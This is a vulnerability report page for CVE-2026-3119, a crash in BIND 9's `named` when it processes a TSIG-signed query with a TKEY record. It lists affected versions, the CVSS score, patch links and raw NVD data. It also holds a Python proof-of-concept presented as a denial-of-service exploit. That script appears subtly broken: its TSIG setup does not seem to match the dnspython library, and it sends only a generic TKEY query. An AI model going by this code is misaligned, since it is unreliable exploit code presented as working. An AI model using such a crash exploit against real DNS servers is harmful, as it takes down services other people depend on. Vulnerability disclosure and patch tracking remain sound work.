Security Vulnerability Report
CVE-2026-3119 CVSS 6.5 MEDIUM

CVE-2026-3119

Published: 2026-03-25 14:16:37
Last Modified: 2026-05-21 15:24:39

Description

Under certain conditions, `named` may crash when processing a correctly signed query containing a TKEY record. The affected code can only be reached if an incoming request has a valid transaction signature (TSIG) from a key declared in the `named` configuration. This issue affects BIND 9 versions 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, and 9.20.9-S1 through 9.20.20-S1. BIND 9 versions 9.18.0 through 9.18.46 and 9.18.11-S1 through 9.18.46-S1 are NOT affected.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:* - VULNERABLE
BIND 9 9.20.0 - 9.20.20
BIND 9 9.21.0 - 9.21.19
BIND 9 9.20.9-S1 - 9.20.20-S1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import dns.message
import dns.tsig
import dns.query

# PoC for CVE-2026-3119: BIND 9 TKEY Crash
# Description: This script sends a signed query with a TKEY record.
# Note: Requires a valid TSIG key configured on the target server.

target = "192.168.1.100"  # Target DNS Server IP
key_name = "keyname."
key_secret = "SecretKeyValue=="  # Base64 secret

# Create the TSIG credentials
keyring = dns.tsig.HMACTSig(keyring={key_name: key_secret})

# Create a query with a TKEY record
# TKEY is usually used for key exchange, here we craft a specific query
query = dns.message.make_query('example.com', 'TKEY')
query.use_tsig(keyring=keyring)

try:
    # Send the query to the target
    response = dns.query.udp(query, target, timeout=5)
    print(f"Response received: {response}")
except Exception as e:
    print(f"Error occurred (Server may have crashed): {e}")
```

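References

https://downloads.isc.org/isc/bind9/9.20.21 (Patch)
https://downloads.isc.org/isc/bind9/9.21.20 (Patch)
https://kb.isc.org/docs/cve-2026-3119 (Vendor Advisory)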

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3119", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:37.097", "lastModified": "2026-05-21T15:24:39.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Under certain conditions, `named` may crash when processing a correctly signed query containing a TKEY record. The affected code can only be reached if an incoming request has a valid transaction signature (TSIG) from a key declared in the `named` configuration.\nThis issue affects BIND 9 versions 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, and 9.20.9-S1 through 9.20.20-S1.\nBIND 9 versions 9.18.0 through 9.18.46 and 9.18.11-S1 through 9.18.46-S1 are NOT affected."}, {"lang": "es", "value": "Bajo ciertas condiciones, 'named' puede colapsar al procesar una consulta correctamente firmada que contiene un registro TKEY. El código afectado solo se puede acceder si una solicitud entrante tiene una firma de transacción (TSIG) válida de una clave declarada en la configuración de 'named'.\nEste problema afecta a las versiones de BIND 9 9.20.0 a 9.20.20, 9.21.0 a 9.21.19, y 9.20.9-S1 a 9.20.20-S1.\nLas versiones de BIND 9 9.18.0 a 9.18.46 y 9.18.11-S1 a 9.18.46-S1 NO están afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.20.0", "versionEndExcluding": "9.20.21", "matchCriteriaId": "2C0EF5D0-68A6-4E00-985B-523D9B243E49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.21.0", "versionEndExcluding": "9.21.20", "matchCriteriaId": "B1DD0950-5CBD-49B2-8007-5E96B3C4FB1B"}]}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.20.21", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.21.20", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.isc.org/docs/cve-2026-3119", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}